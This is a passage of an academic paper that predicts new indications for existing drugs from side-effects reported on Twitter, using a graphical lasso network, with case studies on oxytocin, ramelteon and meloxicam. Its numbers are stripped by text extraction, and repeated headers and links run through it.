which drug ranking is randomized ( . %, standard error ± . ), and another in which drugs are ranked according to the jaccard index ( . %). in ye, liu & wei ( ), a related approach is used to construct a repositioning network based on side-effects extracted from the sider database, meyler’s side effects of drugs, side effects of drugs annual, and the drugs@fda database (kuhn et al., ; aronson, ; ray, ; us food and drug administraction, ), also using the jaccard index as the measure of drug–drug similarity. here, they report an equivilent value of . % of drugs having their indication correctly predicted amongst the top results. while data sets and underlying statistical models clearly differ, these results taken together suggest that the use of side-effect data mined from nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure recovery of known indications. (a) percentage at which a co-indicated drug is returned amongst the top , , , and ranked predictions for a given target, at different λ values—the parameter that weights the ℓ -norm penalty in the graphical lasso (eq. ( )). (b) sparsity of ρ matrix at different λ values, i.e., the number of non-zero elements in the upper triangle divided by (n −n)/ . social media can certainly offer comparable performance to methods using side-effect data extracted from more conventional resources, while the use of a global statistical model such as the graphical lasso does result in improved performance compared to a pairwise similarity coefficient such as the jaccard index. to further investigate the influence of the provenance of the data, we mapped our data set of drugs to chembl identifiers (gaulton et al., ; bento et al., ) which we then used to query sider for side-effects extracted from drug labels. this resulted in a reduced data set of drugs, in part due to the absence of many combination drugs from sider (e.g. the antidepressant symbyax which contains olanzapine and fluoxetine). using the same protocol described above, best performance of . % ( / ) was achieved with a slightly higher λ value of − . best performance on the same data set using side-effects derived from twitter was . % ( / ), again using a λ value of − , while the randomized strategy achieved . % (standard error ± . ), indicating that the use of higher quality side-effect data from sider allows the model to achieve better performance than is possible using twitter data. perhaps more interestingly, combining the correct predictions between the two datasources reveals that are unique to the twitter model, are unique to the sider model, with shared, supporting the use side-effect data mined from social media to augment conventional resources. we also investigated whether our results were biased by the over-representation of particular drug classes within our data set. using using cortellis clinical trials intelligence, we were able to identify the broad class for of the drugs ( . %) in our data set. the five largest classes were benzodiazepine receptor agonists ( / drugs returned amongst the top ranked predictions), analgesics ( / ), h -antihistamines ( / ), cyclooxygenase inhibitors ( / ), and anti-cancer ( / ). this indicates that the over-representation of h -antihistamines and cyclooxygenase inhibitors did result in a bias, and to a lesser extent analgesics, but that the overall effect of these five classes was more subtle ( / returned amongst the top ranked predictions, . %). nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the overall layout of the side-effect network. drugs are yellow, connecting edges are green. the layout is performed using a relative entropy optimization-based method (kovács, mizsei & csermely, ). in total, there are connected nodes, with each having an average of neighbours. painkillers such as paracetamol and ibuprofen have the highest number of connections ( and , respectively), which corresponds to them having the largest number of unique side-effects ( and ) reported on twitter. the strongest connection is between chondroitin and glucosamine (partial correlation coefficient (pcc) . ), both of which are dietary supplements used to treat osteoarthritis, closely followed by the antidepressant and anxiolytic agents phenelzine and tranylcypromine (pcc . ). the best performance of our approach at the top level is achieved when the resulting ρ matrix has a sparsity of . % (figs. b and ) which both justifies the use of the ℓ -norm penalized graphical lasso, and generates a graphical model with approximately a third of the parameters of a fully dense matrix, while the comparable performance at λ values between − and − also indicates a degree of robustness to the choice of this parameter. beyond the top ranked predictions, results are encouraging as the majority of targets ( . %) will have a co-indicated drug identified by considering only the top predictions, suggesting the method is a feasible strategy for prioritisation of repositioning candidates. predicting proposed indications of compounds currently in clinical trials while the previous section demonstrated our approach can effectively recover known indications, predictions after the fact are—while useful—best supported by more forward-looking evidence. in this section, we use clinical trial data to support our predictions where the ultimate success of our target drug is still unknown. using cortellis clinical trials intelligence, we extracted drugs present in our twitter data set that were currently undergoing clinical trials (ending after ) for a novel indication (i.e., for nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure recovery of proposed clinical trial indications. percentage at which a co-indicated drug is returned amongst the top , , , and ranked predictions for a given target, at different λ values. which they were not already indicated), resulting in a subset of drugs currently in trials for indications. figure shows the percentage at which a co-indicated drug was ranked amongst the top , , , and predictions for the target. similar to the recovery of known indications, best performance when considering the top ranked predictions was achieved with a λ value of − , resulting in . % ( / ) of targets having a co-indicated drug, which again compares well to a randomized strategy ( . %, standard error± . ) or a strategy using the jaccard index ( . %). recovery of proposed clinical trial indications is clearly more challenging than known indications, possibly reflecting the fact that a large proportion of drugs will fail during trials and therfore many of the proposed indications analysed here will in time prove false, although the general trend in performance as the sparsity parameter λ is adjusted tends to mirror the recovery of known indications. despite this, a number of interesting predictions with a diverse range of novel indications are made that are supported by exper- imental and clinical evidence; a selection of of the drugs where the trial indication was correctly predicted are presented in table . we further investigated three reposition- ing candidates with interesting pharmacology to understand their predicted results. oxytocin oxytocin is a nonapeptide hormone that acts primarily as a neuromodulator in the brain via the specific, high-affinity oxytocin receptor—a class i (rhodopsin-like) g-protein- coupled receptor (gpcr) (gimpl et al., ). currently, oxytocin is used for labor induction and the treatment of prader-willi syndrome, but there is compelling pre-clinical evidence to suggest that it may play a crucial role in the regulation of brain-mediated processes that are highly relevant to many neuropsychiatric disorders (feifel, ). nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table predicted indications for drugs currently in clinical trials. a selection of drugs which are currently in clinical trials for a new indication, and have a co-indicated drug (“evidence”) ranked amongst the top predictions. “pcc” is the absolute partial correlation coefficient, “id” is the cortellis clinical trials intelligence identifier. average pcc scores for co-indicated drugs ranked amongst the top , , , and positions were . , . , . , . , and . , respectively. drug current indication new indication evidence pcc rank id title ramelteon insomnia bipolar i disorder ziprasidone . ramelteon for the treatment of insomnia and mood stability in patients with euthymic bipolar disorder denosumab osteoporosis breast cancer capecitabine . pilot study to evaluate the impact of denosumab on disseminated tumor cells (dtc) in patients with early stage breast cancer meloxicam inflammation non-hodgkin lymphoma rituximab . a phase ii trial using meloxicam plus filgrastim in patients with multiple myeloma and non-hodgkins lymphoma sulfasalazine rheumatoid arthritis diarrhea loperamide . sulfasalazine in preventing acute diarrhea in patients with cancer who are undergoing pelvic radiation therapy pyridostigmine myasthenia gravis cardiac failure digitoxin . safety study of pyridostigmine in heart failure alprazolam anxiety disorder epilepsy clonazepam . staccato alprazolam and eeg photoparoxysmal response oxytocin prader-willi syndrome schizophrenia chlorpromazine . antipsychotic effects of oxytocin interferon alfa leukemia thrombocythemia hydroxyurea . pegylated interferon alfa- a salvage therapy in high-risk polycythemia vera (pv) or essential thrombocythemia (et) etomidate general anesthesia depression trazodone . comparison of effects of propofol and etomidate on rate pressure product and oxygen saturation in patients undergoing electroconvulsive therapy guaifenesin respiratory tract infections rhinitis ipratropium . the effect of oral guaifenesin on pediatric chronic rhinitis: a pilot study n u g e n t e t a l. ( ), p e e rj c o m p u t. s c i., d o i . /p e e rj-c s . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. a number of animal studies have revealed that oxytocin has a positive effect as an antipsychotic (feifel & reza, ; lee et al., ), while human trials have revealed that intranasal oxytocin administered to highly symptomatic schizophrenia patients as an adjunct to their antipsychotic drugs improves positive and negative symptoms significantly more than placebo (feifel et al., ; pedersen et al., ). these therapeutic findings are supported by growing evidence of oxytocin’s role in the manifestation of schizophrenia symptoms such as a recent study linking higher plasma oxytocin levels with increased pro-social behavior in schizophrenia patients and with less severe psychopathology in female patients (rubin et al., ). the mechanisms underlying oxytocin’s therapeutic effects on schizophrenia symptoms are poorly understood, but its ability to regulate mesolimbic dopamine pathways are thought to be responsible (feifel, ). here, our method predicts schizophrenia as a novel indication for oxytocin based on its proximity to chlorpromazine, which is currently used to treat schizophrenia (fig. ). chlorpromazine also modulates the dopamine pathway by acting as an antagonist of the dopamine receptor, another class i gpcr. interestingly, the subgraph indicates that dopamine also has a high partial correlation coefficient with oxytocin, adding further support to the hypothesis that oxytocin, chlorpromazine and dopamine all act on the same pathway and therefore have similar side-effect profiles. side-effects shared by oxytocin and chlorpromazine include hallucinations, excessive salivation and anxiety, while shivering, weight gain, abdominal pain, nausea, and constipation are common side-effects also shared by other drugs within the subgraph. currently, larger scale clinical trials of intranasal oxytocin in schizophrenia are underway. if the early positive results hold up, it may signal the beginning of an new era in the treatment of schizophrenia, a field which has seen little progress in the development of novel efficacious treatments over recent years. ramelteon ramelteon, currently indicated for the treatment of insomnia, is predicted to be useful for the treatment of bipolar depression (fig. ). ramelteon is the first in a new class of sleep agents that selectively binds the mt and mt melatonin receptors in the suprachiasmatic nucleus, with high affinity over the mt receptor (owen, ). it is believed that the activity of ramelteon at mt and mt receptors contributes to its sleep-promoting properties, since these receptors are thought to play a crucial role in the maintenance of the circadian rhythm underlying the normal sleep-wake cycle upon binding of endogenous melatonin. abnormalities in circadian rhythms are prominent features of bipolar i disorder, with evidence suggesting that disrupted sleep-wake circadian rhythms are associated with an increased risk of relapse in bipolar disorder (jung et al., ). as bipolar patients tend to exhibit shorter and more variable circadian activity, it has been proposed that normalisation of the circadian rhythm pattern may improve sleep and consequently lead to a reduction in mood exacerbations. melatonin receptor agonists such as ramelteon may have a potential therapeutic effect in depression due to their ability to resynchronize the suprachiasmatic nucleus (wu et al., ). in fig. , evidence supporting the repositioning of ramelteon comes from ziprasidone, an atypical antipsychotic used to treat bipolar i disorder and schizophrenia (nicolson & nemeroff, ). ziprasidone is nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure predicted repositioning of oxytocin (red) for the treatment of schizophrenia based on its proximity to the schizophrenia drug chlorpromazine (grey). drugs in the graph are sized according to their degree (number of edges), while the thickness of a connecting edge is proportional to the partial correlation coefficient between the two drugs. the graph layout is performed by cytoscape (lopes et al., ) which applies a force-directed approach based on the partial correlation coefficient. nodes are arranged so that edges are of more or less equal length and there are as few edge crossings as possible. for clarity, only the top ten drugs ranked by partial correlation coefficient are shown. the second-ranked drug by partial correlation coefficient; a number of other drugs used to treat mood disorders can also be located in the immediate vicinity including phenelzine, a non-selective and irreversible monoamine oxidase inhibitor (maoi) used as an an- tidepressant and anxiolytic, milnacipran, a serotonin–norepinephrine reuptake inhibitor used to treat major depressive disorder, and tranylcypromine, another maoi used as an antidepressant and anxiolytic agent. the co-location of these drugs in the same region of the graph suggests a degree of overlap in their respective mechanistic pathways, resulting in a high degree of similarity between their side-effect profiles. nodes in this subgraph also have a relatively large degree indicating a tighter association than for other predictions, with common shared side-effects including dry mouth, sexual dysfunction, migraine, and orthostatic hypotension, while weight gain is shared between ramelteon and ziprasidone. meloxicam meloxicam, a nonsteroidal anti-inflammatory drug (nsaid) used to treat arthritis, is predicted to be a repositioning candidate for the treatment of non-hodgkin lymphoma, via the mobilisation of autologous peripheral blood stem cells from bone marrow. by inhibiting cyclooxygenase , meloxicam is understood to inhibit generation of prostaglandin e , which is known to stimulate osteoblasts to release osteopontin, a protein which encourages bone resorption by osteoclasts (rainsford, ying & smith, ; ogino et al., ). by inhibiting prostaglandin e and disrupting the production of osteopontin, meloxicam may encourage the departure of stem cells, which otherwise would be anchored nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure predicted repositioning of ramelteon (red) for the treatment of bipolar i disorder based on its proximity to ziprasidone (grey). along with ziprasidone, phenelzine, milnacipran and tranyl- cypromine are all used to treat mood disorders. to the bone marrow by osteopontin (reinholt et al., ). in fig. , rituximab, a b-cell depleting monoclonal antibody that is currently indicated for treatment of non-hodgkin lymphoma, is the top ranked drug by partial correlation, which provides evidence for repositioning to this indication. interestingly, depletion of b-cells by rituximab has recently been demonstrated to result in decreased bone resorption in patients with rheumatoid arthritis, possibly via a direct effect on both osteoblasts and osteoclasts (wheater et al., ; boumans et al., ), suggesting a common mechanism of action between meloxi- cam and rituximab. further evidence is provided by the fifth-ranked drug clopidogrel, an antiplatelet agent used to inhibit blood clots in coronary artery disease, peripheral vascular disease, cerebrovascular disease, and to prevent myocardial infarction. clopidogrel works by irreversibly inhibiting the adenosine diphosphate receptor p y , which is known to increase osteoclast activity (bonekey watch, ). similarly to the ramelteon subgraph, many drugs in the vicinity of meloxicam are used to treat inflammation including diclofenac, naproxen (both nsaids) and betamethasone, resulting in close association between these drugs, with shared side-effects in the subgraph including pain, cramping, flushing and fever, while swelling, indigestion, inflammation and skin rash are shared by meloxicam and rituximab. while the side-effects shared within the subgraphs of our three examples are commonly associated with a large number of drugs, some of the side-effects shared by the three drug pairs such as hallucinations, excessive salivation and anxiety are somewhat less common. to investigate this relationship for the data set as a whole, we calculated log frequencies nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure predicted repositioning of meloxicam (red) for the treatment of non-hodgkin lymphoma based on its proximity to rituximab (grey). for all side-effects and compared these values against the normalized average rank of pairs where the side-effect was shared by both the query and target drug. if we assume that a higher ranking in our model indicates a higher likelihood of drugs sharing a protein target, this relationship demonstrates similar properties to the observations of campillos et al. ( ) in that there is a negative correlation between the rank and frequency of a side-effect. the correlation coefficient has a value of− . which is significantly different from zero at the . level, although the linear relationship appears to break down where the frequency of the side-effect is lower than about . . conclusions in this study, we have used side-effect data mined from social media to generate a sparse graphical model, with nodes in the resulting graph representing drugs, and edges between them representing the similarity of their side-effect profiles. we demonstrated that known indications can be inferred based on the indications of neighbouring drugs in the network, with . % of targets having their known indication identified amongst the top ranked predictions, while . % of drugs that are currently in a clinical trial have their proposed trial indication correctly identified. these results indicate that the volume and diversity of drug side-effects reported using social media is sufficient to be of use in side-effect-based drug repositioning, and this influence is likely to increase as the audience of platforms such as twitter continues to see rapid growth. it may also help to address the problem of side-effect under-reporting. we also demonstrate that global statistical models such as the graphical lasso are well-suited to the analysis of large multivariate systems such as drug–drug networks. they offer significant advantages over conventional pairwise similarity methods by incorporating indirect relationships between all variables, while the use of the lasso penalty allows a sparse, parsimonious model to be generated with fewer spurious connections resulting in a simpler theory of relationships. nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. while our method shows encouraging results, it is more likely to play a role in drug repositioning as a component in an integrated approach. whether this is achieved by combining reported side-effects with those mined from resources such as sider, or by using predictions as the inputs to a supervised learning algorithm, a consensus approach is likely to achieve higher performance by incorporating a range of different data sources in addition to drug side-effects, while also compensating for the weaknesses of any single method (emig et al., ). limitations of our method largely stem from the underlying twitter data (plachouras, leidner & garrow, under review). only a small fraction of daily tweets contain reports of drug side-effects, therefore restricting the number of drugs we are able to analyse. however, given that systems such as somedoses are capable of continuously monitoring twitter, the numbers of drugs and reported side-effects should steadily accumulate over time. to address this, in the future it may be possible to extend monitoring of social media to include additional platforms. for example, weibo is a chinese microblogging site akin to twitter, with over million users as of . clearly, tools will have to be adapted to deal with multilingual data processing or translation issues, while differences in cultural attitudes to sharing medical information may present further challenges. extensions to the statistical approach may also result in improved performance. methods such as the joint graphical lasso allow the generation of a graphical model using data with observations belonging to distinct classes (danaher, wang & witten, ). for example, two covariances matrices generated using data from twitter and sider could be combined in this way, resulting in a single model that best represents both sources. an extension to the graphical lasso also allows the decomposition of the sample covariance graph into smaller connected components via a thresholding approach (mazumder & hastie, ). this leads not only to large performance gains, but significantly increases the scalability of the graphical lasso approach. another caveat to consider, common to many other repositioning strategies based on side-effect similarity, is that there is no evidence to suggest whether a repositioning candidate will be a better therapeutic than the drug from which the novel indication was inferred. while side-effects can provide useful information for inferring novel indications, they are in general undesirable and need to be balanced against any therapeutic benefits. our model does not attempt to quantify efficacy or side-effect severity, but it might be possible to modify the natural language processing step during twitter mining in order to capture comparative mentions of side-effects, since tweets discussing both the therapeutic and side-effects of two related drugs are not uncommon. incorporating this information into our model may allow a more quantitative assessment of the trade-off between therapeutic and side-effects to be made as part of the prediction. acknowledgements the authors would like to thank lee lancashire for reading an early draft and andrew garrow for help with cortellis apis. nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this research was funded by thomson reuters global resources. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: thomson reuters global resources. competing interests all authors are employees of thomson reuters. author contributions • timothy nugent conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • vassilis plachouras and jochen l. leidner contributed reagents/materials/analysis tools, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the cortellis clinical trials intelligence ids are provided in table . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references allen mp. . covariance and linear independence. in: understanding regression analysis. new york: springer, – . aronson jk. . meyer’s side effects of drugs. th edition. amsterdam: elsevier. backstrom m, mjorndal t, dahlqvist r. . under-reporting of serious adverse drug reactions in sweden. pharmacoepidemiology and drug safety ( ): – doi . /pds. . banerjee o, el ghaoui l, d’aspremont a. . model selection through sparse maximum likelihood estimation for multivariate gaussian or binary data. the journal of machine learning research : – . barabasi al, gulbahce n, loscalzo j. . network medicine: a network-based approach to human disease. nature reviews genetics ( ): – doi . /nrg . bento a, gaulton a, hersey a, bellis lj, chambers j, davies m, krüger fa, light y, mak l, mcglinchey s, nowotka m, papadatos g, santos r, overington jp. . the chembl nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /pds. http://dx.doi.org/ . /nrg http://dx.doi.org/ . /peerj-cs. bioactivity database: an update. nucleic acids research (database issue):d –d doi . /nar/gkt . bisgin h, liu z, kelly r, fang h, xu x, tong w. . investigating drug repositioning opportunities in fda drug labels through topic modeling. bmc bioinformatics (suppl ):s doi . / - - -s -s . bonekey watch. . p ry and its role in osteoclast activity and bone remodeling. bonekey reports : doi . /bonekey. . . boumans mjh, thurlings rm, yeo l, scheel-toellner d, vos k, gerlag dm, tak pp. . rituximab abrogates joint destruction in rheumatoid arthritis by inhibiting osteoclastogenesis. annals of the rheumatic diseases ( ): – doi . /annrheumdis- - . buse jb, henry rr, han j, kim dd, fineman ms, baron ad. . effects of exenatide (exendin- ) on glycemic control over weeks in sulfonylurea-treated patients with type diabetes. diabetes care ( ): – doi . /diacare. . . . campillos m, kuhn m, gavin ac, jensen lj, bork p. . drug target identification using side-effect similarity. science ( ): – doi . /science. . chee bw, berlin r, schatz b. . predicting adverse drug events from personal health messages. amia annual symposium proceedings : – . cheng f, li w, wu z, wang x, zhang c, li j, liu g, tang y. . prediction of polypharmaco- logical profiles of drugs by the integration of chemical, side effect, and therapeutic space. journal of chemical information and modeling ( ): – doi . /ci x. danaher p, wang p, witten dm. . the joint graphical lasso for inverse covariance estimation across multiple classes. journal of the royal statistical society: series b (statistical methodology) ( ): – doi . /rssb. . dudley jt, sirota m, shenoy m, pai rk, roedder s, chiang ap, morgan aa, sarwal mm, pasricha pj, butte aj. . computational repositioning of the anticonvulsant topiramate for inflammatory bowel disease. science translational medicine ( ): ra doi . /scitranslmed. . duran-frigola m, aloy p. . recycling side-effects into clinical markers for drug repositioning. genome medicine ( ): doi . /gm . emig d, ivliev a, pustovalova o, lancashire l, bureeva s, nikolsky y, bessarabova m. . drug target prediction and repositioning using an integrated network-based approach. plos one ( ):e doi . /journal.pone. . evans we, mcleod hl. . pharmacogenomics–drug disposition, drug targets, and side effects. new england journal of medicine ( ): – doi . /nejmra . feifel d. . oxytocin as a potential therapeutic target for schizophrenia and other neuropsy- chiatric conditions. neuropsychopharmacology ( ): – doi . /npp. . . feifel d, macdonald k, nguyen a, cobb p, warlan h, galangue b, minassian a, becker o, cooper j, perry w, lefebvre m, gonzales j, hadley a. . adjunctive intranasal oxytocin reduces symptoms in schizophrenia patients. biological psychiatry ( ): – doi . /j.biopsych. . . . feifel d, reza t. . oxytocin modulates psychotomimetic-induced deficits in sensorimotor gating. psychopharmacology ( ): – doi . /s . franke a, mcgovern dpb, barrett jc, wang k, radford-smith gl, ahmad t, lees cw, balschun t, lee j, roberts r, anderson ca, bis jc, bumpstead s, ellinghaus d, festen em, georges m, green t, haritunians t, jostins l, latiano a, mathew cg, montgomery gw, nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /nar/gkt http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /bonekey. . http://dx.doi.org/ . /annrheumdis- - http://dx.doi.org/ . /diacare. . . http://dx.doi.org/ . /science. http://dx.doi.org/ . /ci x http://dx.doi.org/ . /rssb. http://dx.doi.org/ . /scitranslmed. http://dx.doi.org/ . /gm http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /nejmra http://dx.doi.org/ . /npp. . http://dx.doi.org/ . /j.biopsych. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /peerj-cs. prescott nj, raychaudhuri s, rotter ji, schumm p, sharma y, simms la, taylor kd, whiteman d, wijmenga c, baldassano rn, barclay m, bayless tm, brand s, büning c, cohen a, colombel j-f, cottone m, stronati l, denson t, de vos m, d’inca r, dubinsky m, edwards c, florin t, franchimont d, gearry r, glas j, van gossum a, guthery sl, halfvarson j, verspaget hw, hugot j-p, karban a, laukens d, lawrance i, lemann m, levine a, libioulle c, louis e, mowat c, newman w, panés j, phillips a, proctor dd, regueiro m, russell r, rutgeerts p, sanderson j, sans m, seibold f, steinhart ah, stokkers pcf, torkvist l, kullak-ublick g, wilson d, walters t, targan sr, brant sr, rioux jd, d’amato m, weersma rk, kugathasan s, griffiths am, mansfield jc, vermeire s, duerr rh, silverberg ms, satsangi j, schreiber s, cho jh, annese v, hakonarson h, daly mj, parkes m. . genome-wide meta-analysis increases to the number of confirmed crohn’s disease susceptibility loci. nature genetics ( ): – doi . /ng. . freifeld cc, brownstein js, menone cm, bao w, filice r, kass-hout t, dasgupta n. . digital drug safety surveillance: monitoring pharmaceutical products in twitter. drug safety ( ): – doi . /s - - -x. friedman j, hastie t, tibshirani r. . sparse inverse covariance estimation with the graphical lasso. biostatistics ( ): – doi . /biostatistics/kxm . gaulton a, bellis lj, bento ap, chambers j, davies m, hersey a, light y, mcglinchey s, michalovich d, al-lazikani b, overington jp. . chembl: a large-scale bioactivity database for drug discovery. nucleic acids research (database issue):d –d doi . /nar/gkr . ghofrani ha, osterloh ih, grimminger f. . sildenafil: from angina to erectile dysfunction to pulmonary hypertension and beyond. nature reviews drug discovery ( ): – doi . /nrd . gimpl g, wiegand v, burger k, fahrenholz f. . cholesterol and steroid hormones: modulators of oxytocin receptor function. progress in brain research : – . ginn r, pimpalkhute p, nikfarjam a, pakti a, o’connor k, sarker a, smith k, gonzalez g. . mining twitter for adverse drug reaction mentions: a corpus and classification benchmark. in: proceedings of the th workshop on building and evaluating resources for health and biomedical text processing, – . hastie t, tibshirani r, wainwright m. . statistical learning with sparsity: the lasso and generalizations. boca raton: crc press. hazell l, shakir sa. . under-reporting of adverse drug reactions: a systematic review. drug safety ( ): – doi . / - - . hu g, agarwal p. . human disease-drug network based on genomic expression profiles. plos one ( ):e doi . /journal.pone. . hurle mr, yang l, xie q, rajpal dk, sanseau p, agarwal p. . computational drug repositioning: from data to therapeutics. clinical pharmacology and therapeutics ( ): – doi . /clpt. . . internet live stats. . twitter usage statistics. available at http://www.internetlivestats.com/ twitter-statistics/ (accessed april ). iorio f, bosotti r, scacheri e, belcastro v, mithbaokar p, ferriero r, murino l, tagliaferri r, brunetti-pierri n, isacchi a, di bernardo d. . discovery of drug mode of action and drug repositioning from transcriptional responses. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . jarvis l. . teaching an old drug new tricks. chemical and engineering news ( ): – . nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /ng. http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /biostatistics/kxm http://dx.doi.org/ . /nar/gkr http://dx.doi.org/ . /nrd http://dx.doi.org/ . / - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /clpt. . http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /peerj-cs. jones n. . too few women in clinical trials? nature epub ahead of print jun doi . /news. . . jones dt, buchan dw, cozzetto d, pontil m. . psicov: precise structural contact prediction using sparse inverse covariance estimation on large multiple sequence alignments. bioinformatics ( ): – doi . /bioinformatics/btr . jung sh, park j-m, moon e, chung yi, lee bd, lee ym, kim jh, kim sy, jeong hj. . delay in the recovery of normal sleep-wake cycle after disruption of the light-dark cycle in mice: a bipolar disorder-prone animal model? psychiatry investigation ( ): – doi . /pi. . . . . karimi s, wang c, metke-jimenez a, gaire r, paris c. . text and data mining techniques in adverse drug reaction detection. acm computing surveys ( ): : – : doi . / . kohler s, bauer s, horn d, robinson pn. . walking the interactome for prioritization of candidate disease genes. american journal of human genetics ( ): – doi . /j.ajhg. . . . kovács ia, mizsei r, csermely p. . a unified data representation theory for network visualization, ordering and coarse-graining. arxiv: article . . krauthammer m, kaufmann ca, gilliam tc, rzhetsky a. . molecular triangulation: bridging linkage and molecular-network information for identifying candidate genes in alzheimer’s disease. proceedings of the national academy of sciences of the united states of america ( ): – doi . 